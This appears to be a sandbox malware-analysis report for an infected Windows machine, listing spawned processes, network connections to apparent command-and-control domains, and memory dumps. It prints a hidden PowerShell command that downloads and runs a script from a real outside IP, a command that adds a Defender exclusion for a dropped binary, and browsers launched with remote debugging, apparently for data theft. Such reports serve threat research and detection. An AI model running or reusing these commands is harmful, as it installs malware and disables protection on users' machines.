"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5108 -childID 3 -isForBrowser -prefsHandle 5100 -prefMapHandle 5096 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {556975f8-63b0-463c-a171-f422ffef4a00} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5344 -childID 4 -isForBrowser -prefsHandle 5348 -prefMapHandle 5352 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {57fab3bd-02d4-4f3f-b10f-aa1227969539} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5472 -childID 5 -isForBrowser -prefsHandle 5480 -prefMapHandle 5484 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3e37934-9c7f-44ee-8dd6-66fdc58491d7} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe
"C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe"
C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"
C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5796 -ip 5796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 792
C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1212 -ip 1212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 808
C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe"
C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2368.tmp\2369.tmp\236A.bat C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\EX0eXUWS\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbc4e2cc40,0x7ffbc4e2cc4c,0x7ffbc4e2cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2288,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2280 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1764,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2512 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1964,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2556 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4416,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4484 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe
"C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4820,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4828 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5012,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4984 /prefetch:8
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yx3jx0rn\yx3jx0rn.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60BF.tmp" "c:\Users\Admin\AppData\Local\Temp\yx3jx0rn\CSCEDF5BF9B205D4E9AA655161C65EFDFFA.TMP"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5256,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5196 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbcc0346f8,0x7ffbcc034708,0x7ffbcc034718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.48.1:443 | exarthynature.run | tcp |
| US | 104.21.48.1:443 | exarthynature.run | tcp |
| US | 104.21.48.1:443 | exarthynature.run | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | croprojegies.run | udp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| GB | 142.250.187.206:443 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 172.217.16.238:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 172.217.16.238:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| N/A | 127.0.0.1:58842 | tcp | |
| N/A | 127.0.0.1:58853 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 2.18.121.79:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r3---sn-aigzrnsl.gvt1.com | udp |
| GB | 74.125.168.232:443 | r3---sn-aigzrnsl.gvt1.com | tcp |
| US | 8.8.8.8:53 | r3.sn-aigzrnsl.gvt1.com | udp |
| US | 8.8.8.8:53 | r3.sn-aigzrnsl.gvt1.com | udp |
| GB | 74.125.168.232:443 | r3.sn-aigzrnsl.gvt1.com | udp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| DE | 5.75.210.149:443 | tcp | |
| US | 35.190.72.216:443 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | ls.t.goldenloafuae.com | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | avx.medianewsonline.com | udp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| BG | 185.176.43.98:80 | avx.medianewsonline.com | tcp |
| BG | 185.176.43.98:80 | avx.medianewsonline.com | tcp |
| GB | 104.86.110.232:80 | e5.o.lencr.org | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.10:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 142.250.200.10:443 | ogads-pa.googleapis.com | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| GB | 142.250.180.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.169.65:443 | clients2.googleusercontent.com | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 213.209.150.137:4151 | towerbingobongoboom.com | tcp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp |
Files
memory/532-0-0x0000000000E70000-0x000000000117D000-memory.dmp
memory/532-1-0x0000000077D34000-0x0000000077D36000-memory.dmp
memory/532-2-0x0000000000E71000-0x0000000000ED1000-memory.dmp
memory/532-3-0x0000000000E70000-0x000000000117D000-memory.dmp
memory/532-4-0x0000000000E70000-0x000000000117D000-memory.dmp
